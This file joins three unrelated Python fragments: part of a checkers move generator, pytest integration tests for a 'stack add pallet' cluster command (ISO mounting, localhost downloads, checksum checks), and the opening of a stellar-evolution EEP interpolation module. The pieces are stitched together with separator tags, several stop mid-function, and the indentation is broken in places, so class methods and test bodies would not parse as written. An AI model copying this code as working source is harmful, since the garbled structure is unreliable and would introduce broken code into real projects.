    6. Arrays 6, 7, 8, 9 are normal moves (UL, UR, BL, BR)
    7. Arrays 10, 11, 12, 13 are jumps (UL, UR, BL, BR)
    8. Array 14 contains the indices of the parent state's action
    """
    self.state = np.zeros((15,8,8), dtype=float)
    self.init_board()
    self.history = [self.state]  # full sequence of states, oldest first
    self.legal_next_states = self.get_legal_next_states(self.history)
    self.move_count = 0
    self.done = False    # True once the game has ended
    self.outcome = None  # set by determine_outcome() when done
    # Display glyphs used when rendering the board.
    self.player1_man = 'x'
    self.player1_king = u'\u0416'
    self.player2_man = 'o'
    self.player2_king = u'\u01D1'
    self.neural_net = neural_net  # optional evaluator; unused by the rules engine
def step(self, next_state):
    """Execute the player's (legal) move. Check to see if the game
    has ended, and update the list of legal next moves.

    Returns (state, outcome, done). Raises ValueError if ``next_state``
    is not one of the currently legal next states.
    """
    # Compare only layers 0-4 (piece positions + current player); the
    # remaining layers hold NN bookkeeping that may legitimately differ.
    if any((next_state[:5] == x[:5]).all() for x in self.legal_next_states):
        self.state = next_state
        self.history.append(self.state)
        self.legal_next_states = self._check_moves(self.history)
        self.done, self.outcome = self.determine_outcome(self.history,
                                                         legal_moves=self.legal_next_states)
        self.move_count += 1
        return self.state, self.outcome, self.done
    else:
        raise ValueError('Illegal next state (invalid move)!')
def get_legal_next_states(self, history):
    """If the game is not done, return a list of legal next moves given
    a history of moves as input. The next moves are actually board states;
    the move to achieve those states is implied.

    This function calls determine_outcome() which also must check
    the legal next states in order to determine the outcome of the game.
    Redundant computation can be avoided by checking the legal next states
    here first and then passing them as an optional argument to
    determine_outcome().
    """
    legal_next_states = self._check_moves(history)
    done, outcome = self.determine_outcome(history,
                                           legal_moves=legal_next_states)
    # Idiom fix: was ``if done == True:`` -- truthiness test is equivalent
    # since determine_outcome() returns a boolean flag.
    if done:
        return []  # Game over
    return legal_next_states
def _check_moves(self, history):
    """Method intended for internal use. Creates a list of the locations
    of all of the pieces on the board divided up into four categories (P1's
    men, P1's kings, P2's men, and P2's kings).

    Checks for all possible ordinary moves of men and kings for the current
    player only. Calls two other internal methods, _check_jumps()
    and _check_king_jumps() to determine if there are jumps possible for
    the player's men and kings, respectively. Per the rules jumps are
    mandatory moves, and so if jump moves exist they are returned by the
    function instead of the ordinary moves.

    The function also determines if an ordinary move results in a man
    reaching King's Row, and kings the man if so.

    Note: the latest state in ``history`` is mutated in place -- layers
    6-13 are written to record which moves/jumps are available from it.
    """
    state = history[-1]
    player = int(state[4,0,0])  # 0 for P1, 1 for P2 (layer 4 is constant)
    xman1, yman1 = np.where(state[0] == 1) # Locations of P1's men
    xking1, yking1 = np.where(state[1] == 1) # Locations of P1's kings
    xman2, yman2 = np.where(state[2] == 1) # Locations of P2's men
    xking2, yking2 = np.where(state[3] == 1) # Locations of P2's kings
    piece_locs = [np.column_stack((xman1, yman1)), np.column_stack((xking1, yking1)),
                  np.column_stack((xman2, yman2)), np.column_stack((xking2, yking2))]
    board = np.sum(state[0:4], axis=0) # All pieces on one 8x8 grid
    idx = player * 2 # State index of player's pieces
    opp_idx = 0 if idx else 2 # State index of opponent's pieces
    fwd = 1 if player == 0 else -1 # Sets forward direction of player's men
    legal_moves = []
    jump_moves = []
    # Get legal moves including jumps for men
    for x, y in piece_locs[idx]: # Men
        if y+1 < 8 and -1 < x+fwd < 8:
            if board[x+fwd,y+1] == 0: # Diagonal-right space open
                temp_state = deepcopy(state)
                temp_state[5:] = 0 # Erase NN layers from previous state
                temp_state[4] = 1 - player # Toggle player
                temp_state[idx,x,y] = 0 # Piece no longer in prev location
                if (fwd == 1 and x+fwd == 7) or \
                   (fwd == -1 and x+fwd == 0): # On King's row, king the man
                    temp_state[idx+1,x+fwd,y+1] = 1
                else: # Not on King's row, man does not become king
                    temp_state[idx,x+fwd,y+1] = 1
                if fwd == 1:
                    state[9,x,y] = 1 # NN layer representing BR move
                    # Layer 14 records the (layer, x, y) of the parent action.
                    temp_state[14,0,0], temp_state[14,0,1], temp_state[14,0,2] = \
                        9, x, y
                else:
                    state[7,x,y] = 1 # NN layer representing UR move
                    temp_state[14,0,0], temp_state[14,0,1], temp_state[14,0,2] = \
                        7, x, y
                legal_moves.append(temp_state)
        if y-1 > -1 and -1 < x+fwd < 8:
            if board[x+fwd,y-1] == 0: # Diagonal-left space open
                temp_state = deepcopy(state)
                temp_state[5:] = 0 # Erase NN layers from previous state
                temp_state[4] = 1 - player # Toggle player
                temp_state[idx,x,y] = 0 # Piece no longer in prev location
                if (fwd == 1 and x+fwd == 7) or \
                   (fwd == -1 and x+fwd == 0): # On King's row, king the man
                    temp_state[idx+1,x+fwd,y-1] = 1
                else: # Not on King's row, man does not become king
                    temp_state[idx,x+fwd,y-1] = 1
                if fwd == 1:
                    state[8,x,y] = 1 # NN layer representing BL move
                    temp_state[14,0,0], temp_state[14,0,1], temp_state[14,0,2] = \
                        8, x, y
                else:
                    state[6,x,y] = 1 # NN layer representing UL move
                    temp_state[14,0,0], temp_state[14,0,1], temp_state[14,0,2] = \
                        6, x, y
                legal_moves.append(temp_state)
        # Check to see if man can jump any of opponent's pieces
        jump_moves.extend(self._check_jumps(x,y,fwd,state,idx,opp_idx,board,player))
    # Get legal moves including jumps for kings
    for x, y in piece_locs[idx+1]: # Kings
        for xmove in range(-1,2,2):
            for ymove in range(-1,2,2):
                if -1 < x+xmove < 8 and -1 < y+ymove < 8:
                    if board[x+xmove,y+ymove] == 0: # Diag space open
                        temp_state = deepcopy(state)
                        temp_state[5:] = 0 # Erase NN layers from previous state
                        temp_state[4] = 1 - player # Toggle player
                        temp_state[idx+1,x,y] = 0 # Piece no longer in prev location
                        temp_state[idx+1,x+xmove,y+ymove] = 1
                        if xmove == 1 and ymove == 1:
                            state[9,x,y] = 1 # NN layer representing BR move
                            temp_state[14,0,0], temp_state[14,0,1], temp_state[14,0,2] = \
                                9, x, y
                        elif xmove == 1 and ymove == -1:
                            state[8,x,y] = 1 # NN layer representing BL move
                            temp_state[14,0,0], temp_state[14,0,1], temp_state[14,0,2] = \
                                8, x, y
                        elif xmove == -1 and ymove == 1:
                            state[7,x,y] = 1 # NN layer representing UR move
                            temp_state[14,0,0], temp_state[14,0,1], temp_state[14,0,2] = \
                                7, x, y
                        elif xmove == -1 and ymove == -1:
                            state[6,x,y] = 1 # NN layer representing UL move
                            temp_state[14,0,0], temp_state[14,0,1], temp_state[14,0,2] = \
                                6, x, y
                        legal_moves.append(temp_state)
                # Check to see if king can jump any of opponent's pieces
        jump_moves.extend(self._check_king_jumps(x,y,state,idx,opp_idx,board,player))
    if jump_moves:
        state[6:10] = 0 # Clear all possible non-jump moves
        return jump_moves # Jumps are mandatory
    return legal_moves
def _check_jumps(self,x,y,fwd,state,idx,opp_idx,board,player):
"""Method intended for internal use. Checks to see if a jump is
possible for a man given its position and the game state. Function
recursively calls itself in case multiple jumps are possible in the
same turn. All jumps are mandatory moves, so a double jump takes
precedence over a single jump, a triple jump over a double jump, etc.
If a jump lands a man on King's row, the man is | |
<filename>test-framework/test-suites/integration/tests/add/test_add_pallet.py
import json
from operator import itemgetter
from contextlib import ExitStack
from textwrap import dedent
class TestAddPallet:
def test_no_pallet(self, host):
	"""Running `stack add pallet` with no args and nothing mounted must fail."""
	outcome = host.run('stack add pallet')
	expected_err = 'error - no pallets specified and /mnt/cdrom is unmounted\n'
	assert (outcome.rc, outcome.stderr) == (255, expected_err)
def test_invalid(self, host):
	"""A local path that does not exist is rejected with a clear error."""
	outcome = host.run('stack add pallet /export/test.iso')
	expected_err = 'error - The following arguments appear to be local paths that do not exist: /export/test.iso\n'
	assert (outcome.rc, outcome.stderr) == (255, expected_err)
def test_username_no_password(self, host, create_pallet_isos):
	"""Supplying username= without password= must be rejected with usage help."""
	iso = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
	outcome = host.run(f'stack add pallet {iso} username=test')
	assert outcome.rc == 255
	# Same text the original built with textwrap.dedent, spelled out literally.
	expected_err = (
		'error - must supply a password along with the username\n'
		'[pallet ...] [checksum=string] [clean=bool] [dir=string] [password=string] [run_hooks=bool] [updatedb=string] [username=string]\n'
	)
	assert outcome.stderr == expected_err
def test_password_no_username(self, host, create_pallet_isos):
	"""Supplying password= without username= must be rejected with usage help.

	BUG FIX: the command previously read `password=<PASSWORD>` (a credential
	redaction artifact); the angle brackets are shell redirection operators,
	so the command under test was malformed. Any literal value works here.
	"""
	result = host.run(f'stack add pallet {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso password=test')
	assert result.rc == 255
	assert result.stderr == dedent('''\
error - must supply a password along with the username
[pallet ...] [checksum=string] [clean=bool] [dir=string] [password=string] [run_hooks=bool] [updatedb=string] [username=string]
''')
def test_minimal(self, host, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
	"""Add the minimal pallet ISO; check both the add output and the listing."""
	iso = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
	added = host.run(f'stack add pallet {iso} output-format=json')
	assert added.rc == 0
	assert json.loads(added.stdout) == [{
		'pallet': 'minimal',
		'version': '1.0',
		'release': 'sles12',
		'arch': 'x86_64',
		'os': 'sles',
	}]
	# The pallet must now show up in `stack list pallet`.
	listing = host.run('stack list pallet minimal output-format=json')
	assert listing.rc == 0
	assert json.loads(listing.stdout) == [{
		'name': 'minimal',
		'version': '1.0',
		'release': 'sles12',
		'arch': 'x86_64',
		'os': 'sles',
		'boxes': '',
	}]
def test_multiple_isos(self, host, host_os, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
	"""Two ISOs passed on one command line should both get added."""
	minimal_iso = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
	arch_iso = f'{create_pallet_isos}/test-different-arch-1.0-prod.arm.disk1.iso'
	assert host.run(f'stack add pallet {minimal_iso} {arch_iso}').rc == 0
	# Both pallets must be listed; sort by name for a stable comparison.
	listing = host.run('stack list pallet minimal test-different-arch output-format=json')
	assert listing.rc == 0
	expected = [
		{'name': 'minimal', 'version': '1.0', 'release': 'sles12', 'arch': 'x86_64', 'os': 'sles', 'boxes': ''},
		{'arch': 'arm', 'boxes': '', 'name': 'test-different-arch', 'os': 'sles', 'release': 'prod', 'version': '1.0'},
	]
	assert sorted(json.loads(listing.stdout), key=itemgetter('name')) == expected
def test_no_mountpoint(self, host, rmtree, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
	"""Adding an ISO must still work when /mnt/cdrom doesn't exist."""
	rmtree('/mnt/cdrom')
	iso = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
	assert host.run(f'stack add pallet {iso}').rc == 0
	# Verify the pallet landed in the database.
	listing = host.run('stack list pallet minimal output-format=json')
	assert listing.rc == 0
	assert json.loads(listing.stdout) == [{
		'name': 'minimal',
		'version': '1.0',
		'release': 'sles12',
		'arch': 'x86_64',
		'os': 'sles',
		'boxes': '',
	}]
def test_mountpoint_in_use(self, host, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
	'''current code should not care about double mounted iso's, or anything mounted in /mnt/cdrom'''
	iso = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
	with ExitStack() as cleanup:
		# Leave something mounted on /mnt/cdrom to simulate a stale mount;
		# guarantee it is unmounted again however the test exits.
		assert host.run(f'mount {iso} /mnt/cdrom').rc == 0
		cleanup.callback(host.run, 'umount /mnt/cdrom')
		assert host.run(f'stack add pallet {iso}').rc == 0
		# Verify the pallet landed in the database.
		listing = host.run('stack list pallet minimal output-format=json')
		assert listing.rc == 0
		assert json.loads(listing.stdout) == [{
			'name': 'minimal',
			'version': '1.0',
			'release': 'sles12',
			'arch': 'x86_64',
			'os': 'sles',
			'boxes': '',
		}]
def test_mountpoint_in_use_mnt(self, host, create_blank_iso, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
	"""An unrelated ISO mounted on /mnt must not interfere with add pallet."""
	with ExitStack() as cleanup:
		# Occupy /mnt with a throwaway ISO; always unmount on exit.
		assert host.run(f'mount {create_blank_iso}/blank.iso /mnt').rc == 0
		cleanup.callback(host.run, 'umount /mnt')
		iso = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
		assert host.run(f'stack add pallet {iso}').rc == 0
		# Verify the pallet landed in the database.
		listing = host.run('stack list pallet minimal output-format=json')
		assert listing.rc == 0
		assert json.loads(listing.stdout) == [{
			'name': 'minimal',
			'version': '1.0',
			'release': 'sles12',
			'arch': 'x86_64',
			'os': 'sles',
			'boxes': '',
		}]
def test_mounted_cdrom(self, host, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
	"""With a pallet already mounted on /mnt/cdrom, a bare `stack add pallet`
	should pick it up from the mountpoint.

	CLEANUP: removed leftover debug lines (`mount | grep /mnt/cdrom` plus a
	`print(result)`) that clobbered `result` and added noise.
	"""
	with ExitStack() as cleanup:
		# Mount our pallet and guarantee it is unmounted on exit.
		result = host.run(f'mount --read-only {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso /mnt/cdrom')
		assert result.rc == 0
		cleanup.callback(host.run, 'umount /mnt/cdrom')
		# Add our minimal pallet that is already mounted
		result = host.run('stack add pallet')
		assert result.rc == 0
		# Check it made it in as expected
		result = host.run('stack list pallet minimal output-format=json')
		assert result.rc == 0
		assert json.loads(result.stdout) == [
			{
				'name': 'minimal',
				'version': '1.0',
				'release': 'sles12',
				'arch': 'x86_64',
				'os': 'sles',
				'boxes': ''
			}
		]
def test_duplicate(self, host, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
	"""Adding the same pallet twice must leave exactly one database entry."""
	iso = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
	for _ in range(2):
		assert host.run(f'stack add pallet {iso}').rc == 0
	listing = host.run('stack list pallet minimal output-format=json')
	assert listing.rc == 0
	assert json.loads(listing.stdout) == [{
		'name': 'minimal',
		'version': '1.0',
		'release': 'sles12',
		'arch': 'x86_64',
		'os': 'sles',
		'boxes': '',
	}]
def test_pallet_already_mounted(self, host, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
	'''shouldn't matter if an iso is mounted elsewhere, we should still be able to add it as a pallet'''
	# CLEANUP: removed leftover debug lines (`mount | grep /mnt/cdrom` and a
	# `print(result)`) that clobbered `result` and added noise.
	with ExitStack() as cleanup:
		# Mount our pallet; the callback makes the final unmount harmless
		# even though we also unmount explicitly below.
		result = host.run(f'mount --read-only {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso /mnt/cdrom')
		assert result.rc == 0
		cleanup.callback(host.run, 'umount /mnt/cdrom')
		# Unmount ISO
		result = host.run(f'umount /mnt/cdrom')
		assert result.rc == 0
		# Add our minimal pallet that is already mounted
		result = host.run(f'stack add pallet {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso')
		assert result.rc == 0
		# Check it made it in as expected
		result = host.run('stack list pallet minimal output-format=json')
		assert result.rc == 0
		assert json.loads(result.stdout) == [
			{
				'name': 'minimal',
				'version': '1.0',
				'release': 'sles12',
				'arch': 'x86_64',
				'os': 'sles',
				'boxes': ''
			}
		]
def test_disk_pallet(self, host, test_file, revert_export_stack_pallets):
	"""A pallet supplied as an on-disk directory (not an ISO) can be added."""
	outcome = host.run(f'stack add pallet {test_file("pallets/minimal")}')
	assert outcome.rc == 0
	# Verify the pallet landed in the database.
	listing = host.run('stack list pallet minimal output-format=json')
	assert listing.rc == 0
	assert json.loads(listing.stdout) == [{
		'name': 'minimal',
		'version': '1.0',
		'release': 'sles12',
		'arch': 'x86_64',
		'os': 'sles',
		'boxes': '',
	}]
def test_network_iso(self, host, run_pallet_isos_server, revert_export_stack_pallets, revert_pallet_hooks):
	"""An ISO fetched over HTTP can be added like a local one."""
	added = host.run('stack add pallet http://127.0.0.1:8000/minimal-1.0-sles12.x86_64.disk1.iso output-format=json')
	assert added.rc == 0
	assert json.loads(added.stdout) == [{
		'pallet': 'minimal',
		'version': '1.0',
		'release': 'sles12',
		'arch': 'x86_64',
		'os': 'sles',
	}]
	# Verify the pallet landed in the database.
	listing = host.run('stack list pallet minimal output-format=json')
	assert listing.rc == 0
	assert json.loads(listing.stdout) == [{
		'name': 'minimal',
		'version': '1.0',
		'release': 'sles12',
		'arch': 'x86_64',
		'os': 'sles',
		'boxes': '',
	}]
def test_network_directory(self, host, run_file_server, revert_export_stack_pallets):
	"""A pallet served as an HTTP directory tree can be added."""
	outcome = host.run('stack add pallet http://127.0.0.1:8000/pallets/minimal/1.0/sles12/sles/x86_64')
	assert outcome.rc == 0
	# Verify the pallet landed in the database.
	listing = host.run('stack list pallet minimal output-format=json')
	assert listing.rc == 0
	assert json.loads(listing.stdout) == [{
		'name': 'minimal',
		'version': '1.0',
		'release': 'sles12',
		'arch': 'x86_64',
		'os': 'sles',
		'boxes': '',
	}]
def test_network_directory_with_extra_slash(self, host, run_file_server, revert_export_stack_pallets):
	'''add pallet should clean up the extra slash - this was a bug we found in stackios :('''
	# Note the double slash after "pallets" — the command must normalize it.
	outcome = host.run('stack add pallet http://127.0.0.1:8000/pallets//minimal/1.0/sles12/sles/x86_64')
	assert outcome.rc == 0
	# Verify the pallet landed in the database.
	listing = host.run('stack list pallet minimal output-format=json')
	assert listing.rc == 0
	assert json.loads(listing.stdout) == [{
		'name': 'minimal',
		'version': '1.0',
		'release': 'sles12',
		'arch': 'x86_64',
		'os': 'sles',
		'boxes': '',
	}]
def test_failed_download(self, host, run_file_server):
	"""A 404 from the file server must surface as an error to the user."""
	outcome = host.run('stack add pallet http://127.0.0.1:8000/test.iso')
	assert outcome.rc == 255
	# Exact middle of the message varies; pin the prefix and suffix only.
	assert outcome.stderr.startswith('error - ')
	assert outcome.stderr.endswith('404 - Not Found\n')
def test_invalid_iso(self, host, create_blank_iso):
	"""A mountable ISO that contains no pallet must be rejected."""
	blank = f'{create_blank_iso}/blank.iso'
	outcome = host.run(f'stack add pallet {blank}')
	# The ISO should be unmounted again, not just deleted, after the failure.
	assert outcome.rc == 255
	assert outcome.stderr.startswith(f'error - The following arguments do not appear to be pallets: {blank}')
def test_jumbo_pallet(self, host, test_file, revert_export_stack_pallets):
	"""A jumbo pallet (containing multiple pallets) adds all of its members.

	CLEANUP: removed a leftover debug `print(...)` of the command line.
	"""
	result = host.run(f'stack add pallet {test_file("pallets/jumbo/")}')
	assert result.rc == 0
	# Check it made it in as expected
	result = host.run('stack list pallet minimal maximal output-format=json')
	assert result.rc == 0
	assert sorted(json.loads(result.stdout), key=itemgetter('name')) == [
		{
			'name': 'maximal',
			'version': '1.0',
			'release': 'sles12',
			'arch': 'x86_64',
			'os': 'sles',
			'boxes': ''
		},
		{
			'name': 'minimal',
			'version': '1.0',
			'release': 'sles12',
			'arch': 'x86_64',
			'os': 'sles',
			'boxes': ''
		},
	]
def test_add_pallet_updates_url(self, host, run_pallet_isos_server, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
	"""Re-adding a pallet from a URL must update its stored source url."""
	iso = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
	assert host.run(f'stack add pallet {iso}').rc == 0
	listing = host.run('stack list pallet minimal expanded=true output-format=json')
	assert listing.rc == 0
	# First add came from a local path, so the url should be a /tmp/ path.
	pallets = json.loads(listing.stdout)
	assert pallets[0]['url'].startswith("/tmp/")
	del pallets[0]['url']
	assert pallets == [{
		'name': 'minimal',
		'version': '1.0',
		'release': 'sles12',
		'arch': 'x86_64',
		'os': 'sles',
		'boxes': '',
	}]
	# Re-add the same pallet via HTTP and confirm the url field follows.
	assert host.run('stack add pallet http://127.0.0.1:8000/minimal-1.0-sles12.x86_64.disk1.iso').rc == 0
	listing = host.run('stack list pallet minimal expanded=true output-format=json')
	assert listing.rc == 0
	assert json.loads(listing.stdout) == [{
		'name': 'minimal',
		'version': '1.0',
		'release': 'sles12',
		'arch': 'x86_64',
		'os': 'sles',
		'boxes': '',
		'url': 'http://127.0.0.1:8000/minimal-1.0-sles12.x86_64.disk1.iso',
	}]
def test_add_pallet_output_wsclient(self, host, run_pallet_isos_server, revert_export_stack_pallets, revert_pallet_hooks):
	"""Adding a pallet through wsclient should report the added pallet as JSON.

	BUG FIX: the URL previously pointed at `1192.168.127.12` — not a valid
	IPv4 address (anonymization artifact). The run_pallet_isos_server fixture
	serves on 127.0.0.1:8000, as used by every other network test here.
	"""
	result = host.run('wsclient add pallet http://127.0.0.1:8000/minimal-1.0-sles12.x86_64.disk1.iso')
	assert result.rc == 0
	assert json.loads(result.stdout) == [
		{
			'pallet': 'minimal',
			'version': '1.0',
			'release': 'sles12',
			'arch': 'x86_64',
			'os': 'sles'
		}
	]
def test_pallet_invalid_sha1sum(self, host, create_pallet_isos, revert_export_stack_pallets):
	"""A wrong sha1 checksum must abort the add and leave nothing behind."""
	minimal = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
	outcome = host.run(f'stack add pallet {minimal} checksum="sha1:d25fd4ada1e1d5c2296831841d6e157644268530"')
	assert outcome.rc != 0
	assert "FAILED" in outcome.stderr
	# The pallet must NOT have been added.
	listing = host.run('stack list pallet minimal output-format=json')
	assert listing.rc != 0
def test_pallet_invalid_checksum(self, host, create_pallet_isos, revert_export_stack_pallets):
	"""An unknown checksum algorithm name must be reported back to the user."""
	minimal = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
	outcome = host.run(f'stack add pallet {minimal} checksum="fsum:d25fd4ada1e1d5c2296831841d6e157644268530"')
	assert outcome.rc != 0
	# The error should both flag the problem and echo the bad algorithm name.
	assert "Invalid checksum type(s) given" in outcome.stderr
	assert "fsum" in outcome.stderr
def test_pallet_invalid_checksum_format(self, host, create_pallet_isos, revert_export_stack_pallets):
	"""checksum must use <type>:<value>; '=' as the separator is rejected."""
	minimal = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
	outcome = host.run(f'stack add pallet {minimal} checksum="sha1=d25fd4ada1e1d5c2296831841d6e157644268530"')
	assert outcome.rc != 0
	assert "You must supply a checksum in the format of <type>:<value>" in outcome.stderr
def test_pallet_invalid_checksums_when_multiple(self, host, run_pallet_isos_server, create_pallet_isos, revert_export_stack_pallets):
	"""With several pallets, one checksum for all of them is an error."""
	minimal = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
	minimal_url = "http://127.0.0.1:8000/minimal-1.0-sles12.x86_64.disk1.iso"
	outcome = host.run(
		f'stack add pallet {minimal} {minimal_url} checksum="sha1:d25fd4ada1e1d5c2296831841d6e157644268530"')
	assert outcome.rc != 0
	assert "Checksum is required for each pallet." in outcome.stderr
def test_pallet_valid_checksum(self, host, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
	# Compute the ISO's real sha1 so the checksum verification succeeds.
	minimal = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
	result = host.run(f'sha1sum {minimal}')
	assert result.rc == 0
	sha1sum = result.stdout.split(' ')[0]
	result = host.run(f'stack add pallet {minimal} checksum="sha1:{sha1sum}"')
	assert result.rc == 0
	# ensure the pallet WAS added (rc == 0 from list means it exists;
	# the original comment incorrectly said "not added")
	result = host.run('stack list pallet minimal output-format=json')
	assert result.rc == 0
def test_pallet_valid_checksum_url(self, host, run_pallet_isos_server, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
minimal = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
result = host.run(f'sha1sum {minimal}')
assert result.rc == 0
sha1sum = result.stdout.split(' ')[0]
# ensure we're checking remote pallets
result | |
<gh_stars>10-100
'''
eep.py
Utilities to downsample stellar evolution tracks to Equivalent Evolutionary
Phase (EEP) basis, according to the method of Dotter (2016).
The default EEP functions are contained in eep.default_eep_functions. They are
default_eep_functions = {
'prems': get_PreMS,
'zams': get_ZAMS,
'eams': get_EAMS,
'iams': get_IAMS,
'tams': get_TAMS,
'rgbump': get_RGBump,
}
You can define and supply your own EEP functions in a dictionary.
EEP functions must have the call signature
function(track, eep_params)
where `track` is a single track.
'''
import numpy as np
import pandas as pd
from scipy.interpolate import interp1d
def _eep_interpolate(track, eep_params, eep_functions, metric_function=None):
	'''
	Given a raw evolutionary track, returns a downsampled track based on
	Equivalent Evolutionary Phases (EEPs). The primary EEPs are defined below,
	and the default ones to use in the computation are listed in
	eep.default_eep_functions. The secondary EEPs are computed based on the
	number of secondary EEPs between each pair of primary EEPs as specified
	in `eep_params.intervals`; these should be defined in the grid
	installation file. If one of the EEP_intervals is 200, then for that pair
	of primary EEPs, the metric distance between those primary EEPs is divided
	into 200 equally spaced points, and the relevant stellar parameters are
	linearly interpolated at those points.

	Parameters
	----------
	track (StarGrid): single-index StarGrid to be interpolated.
	eep_params (dict): dictionary of column names to use in EEP computation,
	    as well as secondary EEP intervals.
	eep_functions (dict): dictionary of callables to use for EEP computation.
	metric_function (callable, optional): function to compute EEP intervals.
	    If none is specified, eep._HRD_distance will be used.

	Returns
	-------
	eep_track, a pandas DataFrame containing the EEP-based track, or None if
	the track never reaches the ZAMS (fewer than two primary EEPs found).
	'''
	i_eep = _locate_primary_eeps(track, eep_params, eep_functions)
	num_intervals = len(i_eep) - 1
	# In some cases, the raw models do not hit the ZAMS. In these cases,
	# return None.
	if num_intervals == 0:
		return
	if metric_function is None:
		metric_function = _HRD_distance
	# compute metric distance along track; dist is cumulative, so the
	# distance *to* each primary EEP is just dist indexed at the EEP rows
	dist = metric_function(track, eep_params)
	primary_eep_dist = dist[i_eep]
	eep_intervals = eep_params['intervals']
	# total output length = all secondary points plus the primary EEPs
	secondary_eep_dist = np.zeros(
		sum(eep_intervals[:num_intervals]) + len(i_eep)
	)
	# Determine appropriate distance to each secondary EEP: divide each
	# primary-to-primary span into (interval + 1) equal steps
	j0 = 0
	for i in range(num_intervals):
		my_dist = primary_eep_dist[i+1] - primary_eep_dist[i]
		delta = my_dist/(eep_intervals[i] + 1)
		new_dist = np.array([primary_eep_dist[i] + delta*j \
			for j in range(eep_intervals[i]+1)])
		secondary_eep_dist[j0:j0+len(new_dist)] = new_dist
		j0 += len(new_dist)
	# close the sequence with the final primary EEP itself
	secondary_eep_dist[-1] = primary_eep_dist[-1]
	# Create list of interpolator functions (one per column, via track.T)
	interp = interp1d(dist, track.T)
	# Interpolate stellar parameters along evolutionary track for
	# desired EEP distances
	eep_track = pd.DataFrame(interp(secondary_eep_dist).T, columns=track.columns)
	eep_track.index.name = 'eep'
	return eep_track
def _locate_primary_eeps(track, eep_params, eep_functions=None):
	'''
	Given a track, returns an array containing indices of Equivalent
	Evolutionary Phases (EEPs).

	Each EEP function is tried in order, starting the search from the index
	found by the previous one. If a phase is not reached (function returns
	-1), the search stops and only the indices found so far are returned.

	Parameters
	----------
	track: single evolutionary track.
	eep_params (dict): column names and intervals used by the EEP functions.
	eep_functions (dict, optional): overrides/additions merged on top of
	    default_eep_functions.

	Returns
	-------
	numpy array of row indices, one per successfully located primary EEP.
	'''
	# BUG FIX: build the function table from a *copy* of the defaults.
	# The original code did `eep_f = default_eep_functions` and then called
	# eep_f.update(...), permanently mutating the module-level default dict
	# and leaking caller overrides into every subsequent call.
	eep_f = dict(default_eep_functions)
	if eep_functions is not None:
		eep_f.update(eep_functions)
	# get indices of EEPs
	i_eep = []
	i_start = 0
	for f in eep_f.values():
		i_phase = f(track, eep_params, i0=i_start)
		i_eep.append(i_phase)
		i_start = i_phase
		if i_start == -1:
			# Phase not reached; drop the failed -1 entry and stop.
			return np.array(i_eep[:-1])
	return np.array(i_eep)
def get_PreMS(track, eep_params, i0=0, logTc_crit=5.0):
	'''
	The pre-main sequence EEP is the point where central temperature rises
	above a certain value (which must be lower than necessary for sustained
	fusion). The default value is log10(T_c) = 5.0, but may be chosen to be
	different. An optional argument i0 can be supplied, which is the
	index to start with.

	This relies on the behavior of pandas.Series.idxmax() for a Series
	of bools. If no temperature is greater than or equal to logTc, the
	natural return value is i0. So we don't mistake this failed search,
	we must check the value at i0 to make sure it satisfies our criterion.
	(That check is presumably handled inside _first_true_index — confirm.)

	Returns
	-------
	`i_PreMS`: (int) index of the first element in track[i0: "logT(cen)"]
	greater than logTc.
	'''
	# Column name for log10 central temperature comes from the grid config.
	log_central_temp = eep_params['log_central_temp']
	logTc_tr = track.loc[i0:, log_central_temp]
	i_PreMS = _first_true_index(logTc_tr >= logTc_crit)
	return i_PreMS
def get_ZAMS(track, eep_params, i0=10, ZAMS_pref=3, Xc_burned=0.001,
		Hlum_frac_max=0.999):
	'''
	The Zero-Age Main Sequence EEP has three different implementations in
	Dotter's code:
	ZAMS1) the point where the core hydrogen mass fraction has been depleted
	    by some fraction (0.001 by default: Xc <= Xmax - 0.001)
	ZAMS2) the point *before ZAMS1* where the hydrogen-burning luminosity
	    achieves some fraction of the total luminosity
	    (0.999 by default: Hlum/lum = 0.999)
	ZAMS3) the point *before ZAMS1* with the highest surface gravity
	ZAMS3 is implemented by default.

	Returns -1 if even ZAMS1 cannot be located (track never burns Xc_burned
	of its initial core hydrogen).
	'''
	core_hydrogen_frac = eep_params['core_hydrogen_frac']
	# Initial core H fraction is taken from the first row of the track.
	Xc_init = track.at[0, core_hydrogen_frac]
	Xc_tr = track.loc[i0:, core_hydrogen_frac]
	# ZAMS1 anchors the search window for the other two definitions.
	ZAMS1 = _first_true_index(Xc_tr <= Xc_init-Xc_burned)
	if ZAMS1 == -1:
		return -1
	if ZAMS_pref == 1:
		return ZAMS1
	if ZAMS_pref == 2:
		hydrogen_lum = eep_params['hydrogen_lum']
		lum = eep_params['lum']
		# Search only up to ZAMS1: ZAMS2 is defined to precede it.
		Hlum_tr = track.loc[i0:ZAMS1, hydrogen_lum]
